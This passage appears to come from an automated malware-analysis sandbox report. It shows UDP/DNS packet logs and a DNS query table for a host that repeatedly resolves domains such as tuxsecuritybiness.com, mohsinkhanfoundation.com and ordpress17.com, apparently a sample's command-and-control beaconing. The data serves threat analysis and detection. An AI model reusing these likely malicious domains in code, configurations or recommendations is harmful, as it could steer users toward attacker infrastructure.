                                          Sep 27, 2021 20:27:24.605662107 CEST53606168.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:25.383204937 CEST5899653192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:25.397234917 CEST53589968.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:26.638611078 CEST5497353192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:26.651721001 CEST53549738.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:28.365613937 CEST6176353192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:28.377547979 CEST53617638.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:29.136183977 CEST6290953192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:29.148997068 CEST53629098.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:29.932790041 CEST6474153192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:29.947721004 CEST53647418.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:30.744966030 CEST5040753192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:30.757169962 CEST53504078.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:31.530476093 CEST6298653192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:31.544518948 CEST53629868.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:32.291270971 CEST4976653192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:32.305871964 CEST53497668.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:33.093796968 CEST6244653192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:33.108398914 CEST53624468.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:33.907108068 CEST5367653192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:33.922348976 CEST53536768.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:34.684026003 CEST5703953192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:34.697350979 CEST53570398.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:35.466766119 CEST4949053192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:35.480268002 CEST53494908.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:37.263170004 CEST6209053192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:37.276654959 CEST53620908.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:38.028683901 CEST6132453192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:38.043040991 CEST53613248.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:38.809356928 CEST5119353192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:38.822201967 CEST53511938.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:39.607177973 CEST6281753192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:39.621783972 CEST53628178.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:40.668811083 CEST5549553192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:40.682873011 CEST53554958.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:41.427077055 CEST5349153192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:41.443505049 CEST53534918.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:42.570655107 CEST6242353192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:42.583395004 CEST53624238.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:43.368947983 CEST5931653192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:43.385703087 CEST53593168.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:44.244988918 CEST6358453192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:44.257919073 CEST53635848.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:45.531595945 CEST5480853192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:47.080384016 CEST5480853192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:47.095489979 CEST53548088.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:47.887803078 CEST5781553192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:47.902513027 CEST53578158.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:48.671917915 CEST4974453192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:48.684627056 CEST53497448.8.8.8192.168.2.7
                                          Sep 27, 2021 20:27:55.215161085 CEST5861153192.168.2.78.8.8.8
                                          Sep 27, 2021 20:27:55.229500055 CEST53586118.8.8.8192.168.2.7

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                          Sep 27, 2021 20:25:46.070871115 CEST192.168.2.78.8.8.80xed48Standard query (0)hoteloaktree.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:46.448447943 CEST192.168.2.78.8.8.80x1ca0Standard query (0)aterwellnessinc.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:46.482814074 CEST192.168.2.78.8.8.80x61fcStandard query (0)sirifinco.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:47.172194958 CEST192.168.2.78.8.8.80xe91Standard query (0)sirifinco.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:47.760514975 CEST192.168.2.78.8.8.80x43e8Standard query (0)ordpress17.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:47.791491985 CEST192.168.2.78.8.8.80x292aStandard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:48.569694042 CEST192.168.2.78.8.8.80xe508Standard query (0)ordpress17.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:48.591152906 CEST192.168.2.78.8.8.80x3911Standard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:49.374650002 CEST192.168.2.78.8.8.80xd446Standard query (0)ordpress17.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:49.419563055 CEST192.168.2.78.8.8.80x2283Standard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:49.429651976 CEST192.168.2.78.8.8.80xd318Standard query (0)r3.i.lencr.orgA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:49.510529995 CEST192.168.2.78.8.8.80xeb28Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:50.363708973 CEST192.168.2.78.8.8.80xa5ddStandard query (0)ordpress17.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:50.396615982 CEST192.168.2.78.8.8.80xa668Standard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:51.680702925 CEST192.168.2.78.8.8.80x144eStandard query (0)ordpress17.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:51.699728966 CEST192.168.2.78.8.8.80x5b79Standard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:52.387361050 CEST192.168.2.78.8.8.80x524eStandard query (0)ordpress17.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:52.406748056 CEST192.168.2.78.8.8.80x5cc9Standard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:52.523611069 CEST192.168.2.78.8.8.80x2148Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:53.092384100 CEST192.168.2.78.8.8.80x4064Standard query (0)ordpress17.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:53.127259970 CEST192.168.2.78.8.8.80x1c01Standard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:54.020759106 CEST192.168.2.78.8.8.80xd66eStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:54.086182117 CEST192.168.2.78.8.8.80xf44eStandard query (0)ordpress17.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:54.112126112 CEST192.168.2.78.8.8.80x26daStandard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:54.783556938 CEST192.168.2.78.8.8.80xeb44Standard query (0)ordpress17.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:54.853558064 CEST192.168.2.78.8.8.80x4e0cStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:54.853847027 CEST192.168.2.78.8.8.80xdb52Standard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:55.726558924 CEST192.168.2.78.8.8.80xe43eStandard query (0)ordpress17.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:55.768619061 CEST192.168.2.78.8.8.80x1154Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:55.769207001 CEST192.168.2.78.8.8.80xb28bStandard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:56.420384884 CEST192.168.2.78.8.8.80x3a39Standard query (0)ordpress17.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:56.438690901 CEST192.168.2.78.8.8.80xd9c3Standard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:57.108278990 CEST192.168.2.78.8.8.80x8f3aStandard query (0)ordpress17.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:57.128237963 CEST192.168.2.78.8.8.80xa53fStandard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:57.800359011 CEST192.168.2.78.8.8.80xba03Standard query (0)ordpress17.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:57.865005016 CEST192.168.2.78.8.8.80x6ec4Standard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:58.576149940 CEST192.168.2.78.8.8.80xa662Standard query (0)ordpress17.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:58.593990088 CEST192.168.2.78.8.8.80x6f6dStandard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:25:59.628273964 CEST192.168.2.78.8.8.80xd3a7Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:00.655344963 CEST192.168.2.78.8.8.80xa418Standard query (0)ordpress17.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:00.679641008 CEST192.168.2.78.8.8.80x5202Standard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:01.331425905 CEST192.168.2.78.8.8.80x485aStandard query (0)ordpress17.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:01.350888968 CEST192.168.2.78.8.8.80x833Standard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:01.451324940 CEST192.168.2.78.8.8.80x7abbStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:02.038477898 CEST192.168.2.78.8.8.80xad79Standard query (0)ordpress17.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:02.057113886 CEST192.168.2.78.8.8.80x74e4Standard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:02.380009890 CEST192.168.2.78.8.8.80x8d2cStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:02.814068079 CEST192.168.2.78.8.8.80xb84cStandard query (0)ordpress17.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:02.835577965 CEST192.168.2.78.8.8.80x14a9Standard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:03.338016987 CEST192.168.2.78.8.8.80x291bStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:03.541110992 CEST192.168.2.78.8.8.80xc730Standard query (0)ordpress17.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:03.559693098 CEST192.168.2.78.8.8.80x8caaStandard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:04.171557903 CEST192.168.2.78.8.8.80x58ddStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:04.254506111 CEST192.168.2.78.8.8.80xe1abStandard query (0)ordpress17.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:04.272145033 CEST192.168.2.78.8.8.80xd25eStandard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:04.996567011 CEST192.168.2.78.8.8.80x3ae2Standard query (0)ordpress17.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:04.997884989 CEST192.168.2.78.8.8.80x1cc3Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:05.016618013 CEST192.168.2.78.8.8.80xe823Standard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:05.756948948 CEST192.168.2.78.8.8.80x3261Standard query (0)ordpress17.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:05.777050972 CEST192.168.2.78.8.8.80xc32dStandard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:05.816279888 CEST192.168.2.78.8.8.80xb3e9Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:06.516752005 CEST192.168.2.78.8.8.80x919bStandard query (0)ordpress17.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:06.538594961 CEST192.168.2.78.8.8.80xe31fStandard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:06.603488922 CEST192.168.2.78.8.8.80xa05dStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:07.247575045 CEST192.168.2.78.8.8.80xd3ceStandard query (0)ordpress17.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:07.265738010 CEST192.168.2.78.8.8.80x58caStandard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:07.428716898 CEST192.168.2.78.8.8.80x700eStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:08.013267040 CEST192.168.2.78.8.8.80x4928Standard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:08.217582941 CEST192.168.2.78.8.8.80xefa0Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:08.672808886 CEST192.168.2.78.8.8.80xf5e3Standard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:09.026392937 CEST192.168.2.78.8.8.80xa130Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:09.368282080 CEST192.168.2.78.8.8.80xd860Standard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:09.825573921 CEST192.168.2.78.8.8.80xc058Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:10.044320107 CEST192.168.2.78.8.8.80x92c1Standard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:10.637665033 CEST192.168.2.78.8.8.80x4737Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:10.767505884 CEST192.168.2.78.8.8.80xbe06Standard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:11.422432899 CEST192.168.2.78.8.8.80x35cbStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:11.458966970 CEST192.168.2.78.8.8.80x24e3Standard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:12.158341885 CEST192.168.2.78.8.8.80xc921Standard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:12.251948118 CEST192.168.2.78.8.8.80xe6bfStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:12.859316111 CEST192.168.2.78.8.8.80x4c70Standard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:13.013920069 CEST192.168.2.78.8.8.80x237cStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:13.519613981 CEST192.168.2.78.8.8.80x9e77Standard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:13.808783054 CEST192.168.2.78.8.8.80xbb50Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:14.152801991 CEST192.168.2.78.8.8.80x6d56Standard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:14.615021944 CEST192.168.2.78.8.8.80xd043Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:14.810760975 CEST192.168.2.78.8.8.80x2fd3Standard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:15.408827066 CEST192.168.2.78.8.8.80x812fStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:15.496860981 CEST192.168.2.78.8.8.80xea9eStandard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:16.127614021 CEST192.168.2.78.8.8.80x7afcStandard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:16.178937912 CEST192.168.2.78.8.8.80xf614Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:16.935102940 CEST192.168.2.78.8.8.80xddbeStandard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:16.992950916 CEST192.168.2.78.8.8.80x7a5cStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:18.310174942 CEST192.168.2.78.8.8.80x158Standard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:18.382625103 CEST192.168.2.78.8.8.80xd7a6Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:19.987658978 CEST192.168.2.78.8.8.80xdbb7Standard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:20.157454014 CEST192.168.2.78.8.8.80x3925Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:20.762372971 CEST192.168.2.78.8.8.80xc814Standard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:20.921623945 CEST192.168.2.78.8.8.80x83cStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:21.455358982 CEST192.168.2.78.8.8.80xe784Standard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:21.696141958 CEST192.168.2.78.8.8.80xa76Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:22.155143023 CEST192.168.2.78.8.8.80x466Standard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:22.939822912 CEST192.168.2.78.8.8.80x53b6Standard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:22.942075014 CEST192.168.2.78.8.8.80x7a15Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:23.621762991 CEST192.168.2.78.8.8.80xd20fStandard query (0)mohsinkhanfoundation.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:23.702198982 CEST192.168.2.78.8.8.80x6a7eStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:24.263060093 CEST192.168.2.78.8.8.80x453aStandard query (0)lendbiz.vnA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:24.492841005 CEST192.168.2.78.8.8.80x9b3bStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:25.363213062 CEST192.168.2.78.8.8.80x3b7dStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:25.985630989 CEST192.168.2.78.8.8.80x8590Standard query (0)lendbiz.vnA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:26.155800104 CEST192.168.2.78.8.8.80x992eStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:26.947745085 CEST192.168.2.78.8.8.80xfeacStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:27.231370926 CEST192.168.2.78.8.8.80xfa21Standard query (0)lendbiz.vnA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:27.725392103 CEST192.168.2.78.8.8.80x2aaStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:28.490812063 CEST192.168.2.78.8.8.80x8f26Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:28.799000025 CEST192.168.2.78.8.8.80x8c90Standard query (0)lendbiz.vnA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:29.333806992 CEST192.168.2.78.8.8.80x7eabStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:30.018964052 CEST192.168.2.78.8.8.80x3c23Standard query (0)lendbiz.vnA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:30.103540897 CEST192.168.2.78.8.8.80x84d6Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:30.912945032 CEST192.168.2.78.8.8.80xc32Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:31.319029093 CEST192.168.2.78.8.8.80xb007Standard query (0)lendbiz.vnA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:31.693260908 CEST192.168.2.78.8.8.80xf59bStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:32.481089115 CEST192.168.2.78.8.8.80xde6Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:33.277252913 CEST192.168.2.78.8.8.80x7889Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:34.087224007 CEST192.168.2.78.8.8.80x5b34Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:34.868655920 CEST192.168.2.78.8.8.80x6794Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:35.848607063 CEST192.168.2.78.8.8.80x3f6Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:37.423644066 CEST192.168.2.78.8.8.80x9487Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:39.222430944 CEST192.168.2.78.8.8.80x5074Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:40.120208025 CEST192.168.2.78.8.8.80x6e95Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:40.930840015 CEST192.168.2.78.8.8.80x49c9Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:41.785125017 CEST192.168.2.78.8.8.80x466bStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:45.583859921 CEST192.168.2.78.8.8.80x8974Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:46.358287096 CEST192.168.2.78.8.8.80x5395Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:47.157856941 CEST192.168.2.78.8.8.80x7728Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:47.923732996 CEST192.168.2.78.8.8.80x575cStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:48.714202881 CEST192.168.2.78.8.8.80x3d0Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:49.501499891 CEST192.168.2.78.8.8.80x9832Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:50.268588066 CEST192.168.2.78.8.8.80xab34Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:51.032918930 CEST192.168.2.78.8.8.80x127bStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:51.799602032 CEST192.168.2.78.8.8.80xa24aStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:52.568475008 CEST192.168.2.78.8.8.80xa0dbStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:53.348994970 CEST192.168.2.78.8.8.80xd59bStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:54.144356012 CEST192.168.2.78.8.8.80xfc2eStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:55.192473888 CEST192.168.2.78.8.8.80xfc2eStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:55.996365070 CEST192.168.2.78.8.8.80x6bebStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:56.759000063 CEST192.168.2.78.8.8.80x23d5Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:57.537885904 CEST192.168.2.78.8.8.80xf177Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:58.304603100 CEST192.168.2.78.8.8.80x1cb2Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:59.087606907 CEST192.168.2.78.8.8.80xb21fStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:26:59.871004105 CEST192.168.2.78.8.8.80x829bStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:00.683235884 CEST192.168.2.78.8.8.80x9009Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:01.461709023 CEST192.168.2.78.8.8.80x2bd3Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:02.250102997 CEST192.168.2.78.8.8.80x20e5Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:03.026706934 CEST192.168.2.78.8.8.80x6be0Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:03.821991920 CEST192.168.2.78.8.8.80xc972Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:04.598339081 CEST192.168.2.78.8.8.80x5e5aStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:05.373821974 CEST192.168.2.78.8.8.80xd82eStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:06.131067991 CEST192.168.2.78.8.8.80xaa85Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:06.934273005 CEST192.168.2.78.8.8.80x4462Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:07.699145079 CEST192.168.2.78.8.8.80xd1bdStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:08.462414026 CEST192.168.2.78.8.8.80x874cStandard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:09.264369011 CEST192.168.2.78.8.8.80xb876Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:10.073828936 CEST192.168.2.78.8.8.80x8171Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:10.844527960 CEST192.168.2.78.8.8.80xb8a8Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:11.619561911 CEST192.168.2.78.8.8.80x2b76Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 20:27:12.415213108 CEST192.168.2.78.8.8.80xf6e7Standard query (0)tuxsecuritybiness.comA (IP address)IN (0x0001)
